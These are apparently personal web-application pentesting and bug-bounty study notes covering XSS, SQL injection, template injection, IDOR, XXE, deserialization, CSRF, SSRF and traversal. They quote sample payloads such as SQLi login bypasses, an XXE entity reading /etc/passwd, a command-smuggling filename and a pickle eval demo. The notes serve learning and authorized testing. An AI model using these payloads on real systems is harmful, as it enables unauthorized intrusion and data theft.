It's confusing that tools, attacks, and exploits often don't make their required context clear. Does a tool / attack / exploit operate:
  • Across the public internet to the target ?
  • Only from another machine in the same LAN as the target ?

  • From a logged-out state ?
  • From a logged-in state ?
  • Require fooling a legitimate user into doing something ?

  • Require that you've obtained source code from the server ?

  • Require that you've managed to get shell access to the target ?
  • Require that you have a root shell on the target ?


Some apps, tools, attacks, or exploits may require that you have specific resources:
  • A public domain and web site that you control.
  • A static IP address, and an incoming port open to your machine.
  • A burner email address.
  • A burner phone number, to receive SMS.
  • A burner credit-card.
  • Money (real or fake) to order products.
  • If you spend real money to get behind a paywall or buy a subscription, you may get into an area that has far fewer bug-bounty hunters in it, or that the developers consider lower-risk.
  • An address to ship to.
  • Accounts on Shodan and other online-database-type sites.

Attack Surfaces

  • The web app (pages shown to user).
  • The mobile app (app on smartphone).
  • Any other app UI (voice call to phone-menu, SMS interface, etc).
  • The browser and add-ons in it.
  • APIs (exposed by any server your code can talk to).
  • Libraries (that are exposed to your code).
  • Servers (that run web app, database, API, authentication, CMS, etc).
  • Containers or Operating Systems (that are exposed to your code).
  • Repositories that may contain credentials or source code or comments.

Attack Targets/Patterns

It's confusing because attacks can be combined in many ways. For example, SQLi:
  • SQLi to read entire table of database back in a page right away. Or,
  • SQLi to put malicious script into database, user gets page with script, script does Request Forgery to Web/App Server. Or,
  • Code Injection to disable parameter-checking in pages in Web/App Server, SQLi on page to get data out of database.

What you'll do

Probably you'll:
  1. Start ZAP and Firefox, and browse the application manually for a while.
  2. Use the results recorded in ZAP to tweak ZAP, telling it about such things as session token names and login credentials.
  3. Run scans and attacks in ZAP and see what it reports.
  4. Explore any vulns, through ZAP and manually in the browser.
  5. Start Metasploit and try to exploit vulns.
  6. Run appropriate specific tools, such as sqlmap, WPScan, CMSmap, etc.
  7. Write reports on anything you've found, double-checking manually in a clean setup.
  8. Try to broaden or chain any vulns and exploits.
  9. Learn more about the application.
  10. Review project checklist, see if you've checked everything.
  11. Iterate as needed.

Aakash Choudhary's "Bug-Hunting-Mentality"
ZeroSec's "LTR101: WebAppTesting - Methods to the Madness"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
OWASP's "Category:Attack"
OWASP Testing Guide v4 Table of Contents
Prasanthi Eati's "10 Most Common Web Security Vulnerabilities"
Gwendal Le Coguic's "Vulnerabilities list"

Detectify's "OWASP Top 10 Vulnerabilities Explained"
David Schutz's "OWASP Top 10 Like I'm Five - BSidesBud2019"

You can look at the OWASP Top 10 for the most common types of vulnerabilities. But also look back at previous years of the list, for items that have been pushed off but still are worth testing.

Sakurity Network's "Why OWASP Top 10 is no longer relevant" (4/2017)

Attacks And Vulnerabilities

Unsafe Input Handling

Code Injection

Mixing data and code.
Submit data that gets executed as code in the context of the application.
Wikipedia's "Code injection"

From Hacktrophy's "Description of basic vulnerabilities":
Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.

Submit a script into a Comment field or theme, it gets stored in the database ("stored cross-site scripting"), and later other users can view your "comment" or use your theme. If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.


<img src='nosuchfile' onerror='alert(123);' />
<a onmouseover='alert(234);'>alert here</a>
HTML5 Security Cheatsheet

HTML Injection: Submit HTML into a Comment field or theme, it gets stored in the database, and later other users can view your "comment" or use your theme, and get fooled by your HTML.
Hacking Articles' "Beginner Guide to HTML Injection"
Ziyahan Albeniz's "Frame Injection Attacks"

CRLF Injection:
Submit a parameter or request that has an encoded CRLF in the middle of it. Could be useful:
  • To inject new directives into the HTTP request header. Or,
  • Where one layer of the protocol or app treats it as one line and another layer treats it as two lines.
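As a minimal Python sketch of the first case (the parameter value and the injected header are made up): a decoded CRLF in a redirect parameter becomes an extra line in the raw response header.

```python
from urllib.parse import unquote

# A naive server builds a raw HTTP response header from a user-supplied value.
def build_response(redirect_to: str) -> str:
    return "HTTP/1.1 302 Found\r\nLocation: " + redirect_to + "\r\n\r\n"

# Encoded CRLF (%0d%0a) in the parameter turns into a new header line.
param = unquote("/home%0d%0aSet-Cookie:%20session=attacker")
response = build_response(param)
print("Set-Cookie: session=attacker" in response)  # -> True: injected header
```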
Offensive Security by Automation's "Automating CRLF"

Null Byte Injection:
Submit a parameter or request that has an encoded 0 byte (\x00, %00) in the middle of it. Could be useful if the page is taking the parameter and appending more characters (such as ".jpeg") to it. The null byte may cause the additional characters to be ignored.

Most browsers will strip "%00" from URLs, but Burp will let you put them in.
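A minimal Python sketch of the append-an-extension case (the filename is hypothetical): the high-level code sees one string, but a C-style layer underneath stops at the NUL byte.

```python
from urllib.parse import unquote

def c_string(s: str) -> str:
    # Simulate a C-style layer: everything after the first NUL byte is ignored.
    return s.split("\x00", 1)[0]

user_input = unquote("shell.php%00")   # decodes to "shell.php\x00"
stored_name = user_input + ".jpeg"     # the app thinks it forced a safe extension
effective = c_string(stored_name)      # a lower layer sees only "shell.php"
print(effective)  # -> shell.php
```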

Encoding Sniffing:
Encode characters in some unusual way that the sanitizing code or encoder won't catch, but the browser will interpret in useful ways.

For example, if the page encoding is not specified, older browsers (such as IE8 and earlier) will accept UTF-7 such as:
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
which will survive sanitizing and URL-encoding, but the browser interprets as:
<script>alert(1)</script>

Mark Baggett's "Come to the Dark Side - Python's Sinister Secrets" (PDF slideshow)

File Upload

If the app has a function that lets a user upload a file to the server, give it filenames that contain "../", or match the name of an existing file (web page or included file) on the server. Give it a valid filename but a dangerous extension (.html, .js, .php, etc).

Or send an HTML file, with name and extension set to something allowed (such as jpeg), but MIME type set to "text/html". If the MIME type gets stored in the database and comes back to the browser later, the browser may use it. [Some older browsers such as IE 6 or 7 may interpret the file as HTML even if the MIME type is set to "image/jpeg", if they see enough HTML inside it. This is called "MIME sniffing".]

Send an XML file. Perhaps field values are not validated properly, and you can put HTML or JavaScript somewhere where it will be displayed/executed later.
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

From tweet by Luke Stephens (hakluke):
MS Office file formats are just zip files filled with XML files (and some other stuff).

If you ever come across an application that parses or displays any MS Word files, try unzipping it, adding an XXE payload to one of the XML files, zipping it back up, and uploading it.
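The unzip / tamper / re-zip step can be sketched with Python's standard zipfile module. The in-memory archive here is a stand-in for a real .docx, and the SYSTEM URL in the payload is just an illustration:

```python
import io
import zipfile

# Build a stand-in for a .docx: a zip archive containing an XML member.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/document.xml", "<?xml version='1.0'?><doc>hello</doc>")

# Hypothetical XXE payload to swap in.
payload = ('<?xml version="1.0"?>'
           '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           '<doc>&xxe;</doc>')

# Rewrite the archive, replacing the XML member with the payload.
out = io.BytesIO()
with zipfile.ZipFile(buf) as src, zipfile.ZipFile(out, "w") as dst:
    for name in src.namelist():
        data = payload if name == "word/document.xml" else src.read(name)
        dst.writestr(name, data)

tampered = zipfile.ZipFile(out).read("word/document.xml").decode()
print("ENTITY xxe" in tampered)  # -> True: payload is inside the "document"
```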

Some image files (PNG) can contain "chunks" that are text or general data. Maybe HTML or scripting can be put into those chunks, or into EXIF ?
PNG (Portable Network Graphics) Specification, Version 1.2 - 4. Chunk Specifications
idontplaydarts' "Encoding Web Shells in PNG IDAT chunks"

Send an archive file (tar, zip, etc) that has filenames inside that have "../" in them ?

Suppose the file is immediately moved somewhere else, using an OS command such as mv or cp ? Give a filename such as "name.jpg;ls;" and see if anything happens.

Sites often use Content Delivery Networks (CDNs), putting user-supplied content on a different domain, to avoid some of these problems. The HTML or code in the file would be "executed" in the domain of the file, not the domain of the page, so would not have access to cookies etc.

Hacking Articles' "5 ways to File upload vulnerability Exploitation"
Hacking Articles' "Web Shells Penetration Testing (Beginner Guide)"
Jean Fleury's "Cross-Site Scripting and File Uploads"
int0x33's "Upload .htaccess as image to bypass filters"
Brute's "File Upload XSS"
OWASP's "Unrestricted File Upload"
Mathias Karlsson and Frans Rosen's "The lesser known pitfalls of allowing file uploads on your website"

outflanknl / EvilClippy (create malicious MS Office documents)
carnal0wnage / malicious_file_maker
chinarulezzz / pixload
Virendra Chandak's "How to create a zip file using PHP"
OWASP's "Test Upload of Malicious Files (OTG-BUSLOGIC-009)"

Script Injection

Give Web/App server a request with scripting in parameters or form fields, and get it to return a page containing that scripting.

This is "reflected scripting", and not really valuable in that it's running with your creds and in your browser. But it reveals that the pages or Web/App Server are handling input unsafely.

If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.
Attacker --req with script in params or fields--> Web/App Server
Attacker <--page with script active-- Web/App Server
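A minimal Python sketch of unsafe vs. escaped reflection (the page fragment and parameter name are made up):

```python
import html

def render_results(query: str) -> str:
    # UNSAFE: the request parameter is reflected into the page unmodified.
    return "<p>Results for: " + query + "</p>"

def render_results_safe(query: str) -> str:
    # Escaping turns the markup into inert text.
    return "<p>Results for: " + html.escape(query) + "</p>"

payload = "<script>alert(1)</script>"
print(render_results(payload))       # script tag goes back to the browser live
print(render_results_safe(payload))  # &lt;script&gt;... is displayed, not executed
```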

SQL Injection (SQLi)

QA engineer walks into a bar 2
Give Web/App server a request with SQL or SQL fragments in parameters or form fields, and see if it sends your SQL to the database.


' OR 1=1 --
' OR 1='1
SLEEP(10) /*' or SLEEP(10) or '" or SLEEP(10) or "*/
1' or '1'='1
For username field of a login page:

admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
Three phases:
"balance" is where you end the apps SQL gracefully,
"inject" is where you write your own SQL,
"comment" is where you comment out any trailing SQL so it doesn't throw an error.

"Inject" could be a complete new SQL statement, or could be a clause added to the existing statement with UNION or something.

In SQL, a UNION appends output rows from another SELECT to the output rows of the first SELECT. The two SELECTs have to produce the same number and types of columns.
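The balance / inject / comment phases can be seen in a minimal sketch using Python's built-in sqlite3 (the table and credentials are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def vulnerable_login(username: str, password: str) -> bool:
    # UNSAFE: user input is concatenated straight into the SQL statement.
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

# balance ('), inject (OR 1=1), comment out the trailing SQL (--):
print(vulnerable_login("admin' OR 1=1 --", "wrong"))  # -> True: bypassed
print(vulnerable_login("admin", "wrong"))             # -> False
```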

Some forms of SQLi:
  • Reflected (AKA first-order SQLi).

    User input from HTTP request is incorporated into SQL operation to database server, and results come back in the page from the app server. It is non-persistent.
    Attacker --req with malicious SQL--> Web/App Server --malicious SQL--> Database Server
    Attacker <--page with secret data-- Web/App Server <--secret data-- Database Server

  • Stored (AKA second-order SQLi, or persistent SQLi).

    Attacker's code is stored in the server and used when other users request pages. This is persistent. Common in applications where users can communicate with each other, or admins review user-generated content.

The SQL sent to the database could:
  • Return secret data (e.g. passwords) to the Attacker.
  • Store malicious script into the database ("stored scripting"), which can later be served in pages to legitimate users.
  • Delete or destroy or encrypt (ransomware) the database.
  • Maybe weaken security settings on the database.
  • Maybe run OS commands on the database server machine.

"Blind" SQLi is when you can't directly see the result of the SQL operation.

Look for anywhere that the user or client page is specifying SQL terms directly, such as ASC or DESC or a column number for the ORDER BY clause.

It's very helpful to know what type of database server is present; SQL for them varies.

Paraphrased from Zenodermus Javanicus's "Basic of SQL for SQL Injection part 2":
If the input value is enclosed with single quotes in the SQL stmt, a single quote as input will give error.
If the input value is enclosed with double quotes in the SQL stmt, a double quote as input will give error.
If the input value is not enclosed with anything in the SQL stmt, both a single quote or a double quote as input will give error.

Different database server types give different error msg formats; see the article for details.

If you're getting visibility of only a single value, use SQL like:

-- return values starting from row 0, return only 1 row's data
Select Username from users limit 0,1;

If you're getting visibility of only a single row, use SQL like:

-- return values starting from row 0, return only 1 row's data
Select * from users limit 0,1;

SQL Fiddle
Jayson Grace's "SQL Cheatsheet"

Guru99's "SQL Injection Tutorial: Learn with Example"
SQL Injection articles in Hacking Articles' "Web Penetration Testing"
See Chapter 9 "Attacking Data Stores" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
Series of 5 articles starting with DRD_'s "Database & SQL Basics Every Hacker Needs to Know"
DRD_'s "Attack Web Applications with Burp Suite & SQL Injection"
Allen Freeman's "The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL Database"
DRD_'s "Use SQL Injection to Run OS Commands & Get a Shell"
Wikipedia's "SQL injection"
Security Idiots' "Posts Related to Web-Pentest-SQL-Injection"
Uses different terminology: ninja hatori's "Example of a Error-Based SQL Injection"

Portswigger's "SQL injection cheat sheet" (probably requires login)
EdOverflow / bugbounty-cheatsheet /
netsparker's "SQL Injection Cheat Sheet"
trietptm / SQL-Injection-Payloads
Polyglot injection strings.
Maybe most likely on pages that are sorting data or showing tables of data.
pentestmonkey's "SQL Injection" cheat sheets
Reiner's "SQLi filter evasion cheat sheet (MySQL)"
"Rails SQL Injection"

See SQL tools.

XKCD about little Bobby Tables

Server-Side Template Injection (SSTI)

For sites using a server-side template engine such as Jinja2 (used by Flask), Mako, Jade, ERB or Slim (Ruby), Velocity, or Smarty. Usual telltale is a construct like "{{title}}" in the URL or HTML.

Give Web/App Server a request with template code in parameters or form fields, and see if the Template Engine executes the code.
Attacker --req with malicious template code in param--> Web/App Server + Template Engine
Attacker   <--page with template code executed-- Web/App Server + Template Engine

This is "reflected templating", and it's running with your creds. But it reveals that the pages or Web/App Server or Template Engine are handling input unsafely.

Maybe this can be used to get the Template Engine to run code you give it. Depending on how and where the Template Engine is running, this could give access to files or commands on the Web/App Server or Template Engine Server, or enable requests to other servers. If you can modify files on the servers, maybe you can modify pages that are served to other users.
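Real SSTI targets engines like the ones above; as a self-contained Python analogue (names and values are made up), here a user-supplied format string plays the role of the template and reaches attributes it was never meant to see:

```python
class User:
    def __init__(self, name: str, password: str):
        self.name = name
        self.password = password   # secret, never meant to be rendered

def render(template: str, user: User) -> str:
    # UNSAFE: the user-supplied string is treated as the template itself.
    return template.format(user=user)

u = User("alice", "hunter2")
print(render("Hello {user.name}!", u))      # intended use
print(render("Hello {user.password}!", u))  # attacker's template leaks the secret
```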

From James Kettle's "Server-Side Template Injection":
"The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS."

Sven Morgenroth's "Server-Side Template Injection Introduction & Example"
EdOverflow / bugbounty-cheatsheet / Template Injection

Client-Side Template Injection (CSTI)

For sites using a client-side template engine/library such as AngularJS, Angular, React, or Vue. Usual telltale is construct like "{{title}}" in the URL or HTML.

The attack could be:
  • Persistent (stored): attacker's data is stored in server and served to users in pages.
  • Non-persistent (reflected): attacker's data is on a link that user somehow clicks on or is redirected to.
Then the attacker's code is running in the user's browser, and could do a Request Forgery or Browser Exploitation or something.

tijme / angularjs-csti-scanner

Client-side HTTP Parameter Pollution (CSHPP)

Web/App Server expects an HTTP request with parameters, forms request to Back-End Server. But you give it a request with extra or duplicate or malformed parameters, so the request to Back-End Server is malicious.
Attacker --req with malicious params--> Web/App Server --malicious req--> Back-End Server
One place to do this is where you see an HTML tag with a "disabled" or "readonly" attribute in a form. That's a signal that the app assumes the parameter will be submitted unchanged, or not submitted at all, to the server.

Another case is where code/tag has been commented out. Maybe there's extra functionality on the server that you can activate by un-commenting.

Server-side HTTP Parameter Pollution (SSHPP)

Back-End Server expects an HTTP request from Web/App Server. But you give it a malicious request directly from your browser with extra or duplicate or malformed parameters, and Back-End Server executes the request.
Attacker --req with malicious params--> Back-End Server

There are other kinds of "injections": LDAP, XPath (XML Path Language; query for XML data), IMAP, SMTP.

Insecure Direct Object Reference (IDOR)

Now being renamed to Broken Object Level Authorization (BOLA) ?
Sometimes called "forced browsing" ?

Parameters in URL or in POST are referencing objects, but the parameters can be changed to reference other objects.

From Hacktrophy's "Description of basic vulnerabilities":
IDORs occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Classic example is a URL like "domain/page?userid=1234&operation=buy". Change "1234" to another number, do a purchase using that user's info.
Attacker --req with changed params--> Web/App Server
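A minimal Python sketch of the missing check (the data and names are made up):

```python
ORDERS = {
    1234: {"owner": "alice", "card": "4111-****"},
    5678: {"owner": "bob",   "card": "5500-****"},
}

def get_order_vulnerable(session_user: str, order_id: int):
    # UNSAFE: trusts the id from the URL; never checks ownership.
    return ORDERS.get(order_id)

def get_order_fixed(session_user: str, order_id: int):
    # Object-level authorization: the record must belong to the requester.
    order = ORDERS.get(order_id)
    return order if order and order["owner"] == session_user else None

print(get_order_vulnerable("alice", 5678))  # bob's record leaks to alice
print(get_order_fixed("alice", 5678))       # -> None
```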
Aon's "Finding more IDORs - Tips and Tricks"
zseano's "Learning about Insecure Object Reference (IDOR)"
Hacking Articles' "Beginner Guide to Insecure Direct Object References (IDOR)"
InsiderPhD's "Why Your IDORs Get NA'd, Cookies Explained" (video)

Open Redirect

Web app page is redirecting the user to some other page, but you find a way to change the redirection so they go to your page. User may not notice that they're no longer in the trusted app.

From Hacktrophy's "Description of basic vulnerabilities":
... when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials or other sensitive data.

Several code types that do a redirect:
  • Parameter in URL or in POST is referencing some app URL to go to. For example, a URL like "apppage.php?url=newpage.php". The server-side code in apppage.php will do the redirect.

    URL parameters likely to do a redirect:
    • url= (or anything with "url" in it)
    • uri= (ditto)
    • dest=
    • continue=
    • redirect=
    • window=
    • next=
    • goto=

  • Client page code that redirects:
    • HTML: <meta http-equiv="refresh" content="0; url=newpage.php">
    • JavaScript: document.location='newpage.php';
    • JavaScript: document.URL='newpage.php';
    • JavaScript: window.location.href='newpage.php';
    • JavaScript: window.location.assign('newpage.php');
    • JavaScript: window.location.replace('newpage.php');
    • JavaScript: window.navigate('newpage.php');
    • JavaScript:'newpage.php');
    • Flask framework: redirect('newpage.php');

  • URL trickery:

Try changing protocol in the redirect, from HTTPS to HTTP, or HTTP to FTP.

But how do you change a redirect in code supplied to some other user ? I guess you have to do a different exploit to do that.

If code checks that the redirected-to URL is valid, you have to fool that code somehow.

zseano's "Learning about Open Url Redirects"
OWASP's "Testing for Client Side URL Redirect (OTG-CLIENT-004)"
OWASP / CheatSheetSeries /

Unsafe API Input Handling

An API essentially is a complete additional attack surface, subject to many of the same vulnerabilities that a web app may have: SQLi, IDOR, etc.

XML External Entities (XXE)

("The 'S' in 'XML' stands for 'Security'.")

XML objects usually contain data, but they can contain items that fetch from a URL or cause execution of code.

(This is similar to Server-Side Request Forgery (SSRF) in that the object usually will be parsed and executed by the web/app server.)

Fetch can be done through defining a new "entity" inside the file, of form
<!ENTITY foo SYSTEM "file:///etc/passwd" >
so that a reference to "&foo;" then causes the file to be fetched. Also
<!ENTITY foo SYSTEM "" >
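The entity mechanism is visible with an internal entity in Python's standard library. A real XXE swaps the literal value for a SYSTEM identifier, which a vulnerable parser then fetches (Python's expat-based parsers don't fetch external entities by default):

```python
import xml.etree.ElementTree as ET

# An internal entity declared in the DTD is expanded by the parser.
doc = ET.fromstring(
    '<!DOCTYPE r [<!ENTITY greet "expanded-by-the-parser">]>'
    '<r>&greet;</r>')
print(doc.text)  # -> expanded-by-the-parser

# The XXE variant: same structure, but the entity points at a file or URL.
xxe_payload = ('<!DOCTYPE r [<!ENTITY foo SYSTEM "file:///etc/passwd">]>'
               '<r>&foo;</r>')
```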

Also send XSLT that generates HTML.

Internal DTD Declaration: inside the XML, add DTD (maybe through a DOCTYPE line that references an external DTD file, or through ENTITY lines) that affects how the XML is parsed and maybe executed.

Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

The attack could be:
  • Persistent (stored): attacker's XML or DTD is stored in server and served to users in pages.
  • Non-persistent (reflected): attacker's data is on a link that user somehow clicks on or is redirected to.
Attacker --XML with malicious content--> API Server
Attacker <--result with secret data-- API Server
This attack could be to an API server, or just a file upload to a file/web server. It's a form of code or script injection, I guess.
klose's "XXE Attacks - Part 1: XML Basics"
Portswigger's "XXE injection"
Robert Schwass's "XML External Entity - Beyond /etc/passwd (For Fun & Profit)"
EdOverflow / bugbounty-cheatsheet / XXE
EdOverflow / bugbounty-cheatsheet / XSLT Injection
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
phonexicum's "XXE"

Insecure Deserialization

Find where an app accepts a serialized object over RPC or out of database or something, and give it a modified or malicious object. The object could have a forged data state, or cause code execution.

Some client-side frameworks which communicate with app server using serialized objects: Flex, Silverlight, Java, Flash.

DSer plug-in to Burp Suite for viewing and manipulating serialized Java objects. Flash AMF support is built into Burp. WCF binary SOAP plug-in for Burp handles Silverlight WCF / NBFS.
Attacker --serialized object with malicious content--> API Server
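Python's pickle shows the core problem in a few lines: the serialized bytes, not the receiving code, decide what runs during deserialization. Here the payload merely evaluates an arithmetic expression, but it could be any call:

```python
import pickle

class Exploit:
    def __reduce__(self):
        # Tells pickle "to rebuild this object, call eval('2 + 2')".
        # The call happens in whatever process unpickles the bytes.
        return (eval, ("2 + 2",))

payload = pickle.dumps(Exploit())  # attacker serializes...
result = pickle.loads(payload)     # ...victim deserializes: code runs here
print(result)  # -> 4
```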

Linus Sarud's "OWASP TOP 10: Insecure Deserialization"
Aditya Chaudhary's "Insecure Deserialization"
Vickie Li's "Deserialization Bugs in the Wild"

Insecure API

Many mobile and web-app APIs (RESTful APIs, SOAP, GraphQL, gRPC, more) involve sending a data or command object (encoded as XML, JSON, HTML, etc) over an HTTP connection. If user-supplied data can get into those objects, maybe something malicious can be done.

A RESTful API may also be called a "CRUD" API: Create / Read / Update / Delete.
These often map to the HTTP methods POST / GET / PUT (or POST) / DELETE (or POST).
The response usually is JSON. (But "RESTful" covers a lot of variations: article.)

GraphQL may use URLs such as "gql?q=..." or "graphql?q=..." or "g?q=...".
The request is JSON, and the operation is specified inside the request, not on the URL ?
The response usually is JSON.

A web app function that sends email may feed user input into an SMTP connection. Try appending an extra address to the end of the From address. Try "Cc" instead of "Bcc", try "%0d%0a" instead of "%0a". In the body of the message, you may be able to end one message and start a second different message to a different address.

Look in web server's /.well-known directory, for any files that represent API capabilities. Also search the web for "targetname API" or "targetname developer docs" or look on GitHub or StackExchange.
ghostlulz's "Swagger API"
Niemand's "Exploiting Application-Level Profile Semantics (ALPS)"
Attacker --object with malicious content--> API Server
Attacker --req with malicious params--> Web/App Server --object with malicious content--> API Server

Ole Lensmar's "API Security Testing" (slideshow)
Asfiya Shaikh's "Web Services & API Pentesting - Part 1"
javatpoint's "Web Service Components"
Philippe De Ryck's "Common API security pitfalls" (video)
Inon Shkedy's "Testing and Hacking APIs" (video)
Sharanbasu Panegav's "API Penetration Testing with OWASP 2017 Test Cases"
smodnix / 31-days-of-API-Security-Tips

Viacheslav Dontsov's "API testing: useful tools, Postman tutorial and hints"
Mike Yockey's "API Testing with Postman"
Rushyendra Reddy Induri's "Getting Started with Postman for API Security Testing: Part 1"
Mic Whitehorn-Gillam's "Better API Penetration Testing with Postman - Part 1"
James Messinger's "API testing tips from a Postman professional"
Download Postman

REST test test ...
Prakash Dhatti's "Penetration Testing RESTful Web Services"
OWASP / CheatSheetSeries /
Web Application Description Language (WADL)

Jean Fleury's "Web Services and SOAP Injections"
streaak/keyhacks (ways to test leaked API keys to see if they're valid)

ghostlulz's "API Hacking GraphQL"
swisskyrepo / GraphQLmap

If an app has multiple APIs, don't assume that they all implement the same security mechanisms. Test them as if they are separate applications.

Check to see if an app has multiple API servers running different versions of the same API.

Tweet from @Wesecureapp_RD:
7 out of every 10 applications we test are vulnerable to payment-related issues.
Tips for finding payment-related issues:
1 - Straightforward tampering the amount parameter before reaching the gateway.
2 - Tampering callback from failed to success.
Tweet from @nnwakelam:
I find for a lot of API's when you can prove the existence of a directory say /api/ you should try /v1/, /v2/, /v3/ (all different from a normal 404) and then baseline that against what a normal 404 looks like. Easy way to confirm path existence and keep bruteforcing.
Tweet from @_jensec:
If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json and it will fetch out json data without checking access control.


AJAX

Used inside a web page to make asynchronous requests back to the web/app server. May send XML or JSON over HTTP. Uses the XMLHttpRequest object in JavaScript.


Directory Traversal

If you can get access to the filesystem of a server, either via modification of a page, or via unexpected URLs or URL parameters, you can try many different filenames to see if they exist and can be read. And you can add prefixes to the filenames to go up and down in the directory tree.
Attacker --req for file X--> Web/App Server
Attacker <--contents of file X-- Web/App Server
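A minimal Python sketch (paths are hypothetical) of how "../" prefixes escape a web root, and one common containment check:

```python
import posixpath

WEB_ROOT = "/var/www/html"

def resolve(user_path: str) -> str:
    # UNSAFE: joins user input directly under the web root.
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_path))

print(resolve("images/logo.png"))      # -> /var/www/html/images/logo.png
print(resolve("../../../etc/passwd"))  # -> /etc/passwd : escaped the web root

def is_safe(user_path: str) -> bool:
    # One common fix: canonicalize first, then require the result
    # to still sit under the web root.
    return resolve(user_path).startswith(WEB_ROOT + "/")

print(is_safe("../../../etc/passwd"))  # -> False
```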
Example prefixes:
../
..%2f (URL-encoded)
..%252f (double-URL-encoded)
....// (survives naive stripping of "../")

DRD_'s "Perform Directory Traversal & Extract Sensitive Information"
DRD_'s "How to Find Directories in Websites Using DirBuster"
Look in the sitemap to get basic coverage.
Look in /robots.txt for stuff that's not supposed to be exposed.
BitTheByte / WayRobots
Look in the Wayback Machine for old pages that no longer appear in the UI, but may still be on the server, or may reveal something about the application.
Administration pages: admin, cpanel, adduser.

On-site Request Forgery (OSRF; AKA 'session riding')

Give a user a malicious page or frame from the application, while they're logged into the Web/App Server. Then the malicious code can do application operations using the user's credentials/authentication.

This is called "on-site" or "stored" RF; the malicious code is stored in the database.
Attacker --req with malicious script--> Web/App Server --SQL to store malicious script--> Database Server
User --request--> Web/App Server --SQL--> Database Server
User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

Modified from "Penetration Testing" by Georgia Weidman:
"RF exploits a website's trust in the user's browser".

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Cross-Site Request Forgery (CSRF or XSRF)

User is logged into the Web/App Server. Get them to open a page from Attacker's Server, and that page does application operations using their credentials/authentication.

From Hacktrophy's "Description of basic vulnerabilities":
CSRF is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf ...

This is "cross-site" because the malicious code running in another domain makes a request to the web-app in its domain.

But it's a bit different from reflected XSS in that here the operation is violating same-origin policy: it's coming from a different domain. Apparently SOP only prevents the response back to the browser, not the request. I guess it's up to the web-app to decide if the request is good or bad. The operation has to be accomplished in one request; there is no opportunity for req1-resp1-req2...

From Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
The same-origin policy does not prohibit one website from issuing requests to a different domain. It does, however, prevent the originating website from processing the responses to cross-domain requests.

Often this is prevented by using "anti-CSRF tokens", sending a random token from the app server and embedding it in any operation back to the app server. If an app doesn't do this, it may be broken. Relying only on a cookie is not good enough, because the browser will automatically provide that cookie with every request to the domain it is associated with, even if the request originates from another domain.

The anti-CSRF token would be embedded in a POST form back to the server, not a GET. If an app is changing state through GETs, probably something is wrong with the design.
User --request--> Attacker's Server
User <--page with malicious script-- Attacker's Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

From "Penetration Testing" by Georgia Weidman:
"CSRF exploits a website's trust in the user's browser".

Sjoerd Langkemper's "Cross site request forgery (CSRF)"
DRD_'s "Manipulate User Credentials with a CSRF Attack"
See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
CSRF articles in Hacking Articles' "Web Penetration Testing"
zseano's "Cross Site Request Forgery & bypassing protection"
Shahmeer Amir's "6 Methods to bypass CSRF protection on a web application"
Trust Foundry's "Cross-Site Request Forgery Cheat Sheet"
debasishm89 / burpy runs on Burp log file, it reports places where CSRF bypass (avoid defenses) might be viable.

Common critical functions to try CSRF:
  • Add/upload file.
  • Email change.
  • Delete file.
  • Password change.
  • Transfer money.
  • Profile edit.

Look for /crossdomain.xml and /clientaccess-policy.xml files.

To test an application's handling of cross-domain requests using XMLHttpRequest, try adding an Origin header specifying a different domain, and examine any Access-Control headers that are returned.

Server-Side Request Forgery (SSRF)

Usually shown as something like "redirect.php?url=", where the URL comes from the user or the client page somehow, or you can modify it.

Browser requests go to the Web/App Server, which normally turns around and makes a request to a Back-End Server. Try to modify parameters so the Web/App Server requests some other server, not the Back-End Server. Or submit a "file:///etc/passwd" or "http://localhost/something" or "telnet://databaseserver" or "http://databaseserver:23/" URL.

This vuln usually shows up where one system talks to another, with some degree of user input or control.
